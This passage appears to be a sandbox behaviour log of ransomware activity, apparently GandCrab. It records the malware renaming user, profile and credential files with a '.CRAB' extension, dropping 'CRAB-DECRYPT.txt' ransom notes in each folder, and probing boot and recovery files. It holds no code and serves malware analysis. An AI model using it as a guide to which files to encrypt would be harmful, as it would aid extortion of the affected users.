Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\LocalLow\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\LocalLow\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7B2238AACCEDC3F1FFE8E7EB5F575EC9.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B2238AACCEDC3F1FFE8E7EB5F575EC9.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Identities\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\CREDHIST.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500\Preferred.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Contacts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Contacts\Administrator.contact.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Favorites\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Favorites\Links\Web Slice Gallery.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSN Autos.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSN Money.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSN Sports.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSN.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\MSN Websites\MSNBC News.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\Windows Live\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Favorites\Windows Live\Get Windows Live.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\NTUSER.DAT.LOG1.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\ntuser.ini.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Searches\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Searches\Everywhere.search-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\Searches\Indexed Locations.search-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Default\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Default\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Libraries\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Libraries\RecordedTV.library-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Music\Sample Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Music\Sample Music\Kalimba.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Music\Sample Music\Sleep Away.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Recorded TV\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Recorded TV\Sample Media\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Videos\Sample Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Temp\\pidor.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Get Info C:\Users\Public\RT0FV0pH.exe type = size True 1
Fn
Get Info C:\Users\Public\RT0FV0pH.exe type = size True 1
Fn
Get Info C:\Users\Public\RT0FV0pH.exe type = size True 1
Fn
Get Info C:\bootmgr type = file_attributes True 1
Fn
Get Info C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi type = file_attributes True 1
Fn
Get Info C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\Winre.wim type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{1d99f231-08df-4547-9987-3ce24f9e555d}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_OnDiskSnapshotProp type = file_attributes True 1
Fn
Get Info C:\System Volume Information\SPP\OnlineMetadataCache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_OnDiskSnapshotProp type = file_attributes True 1
Fn
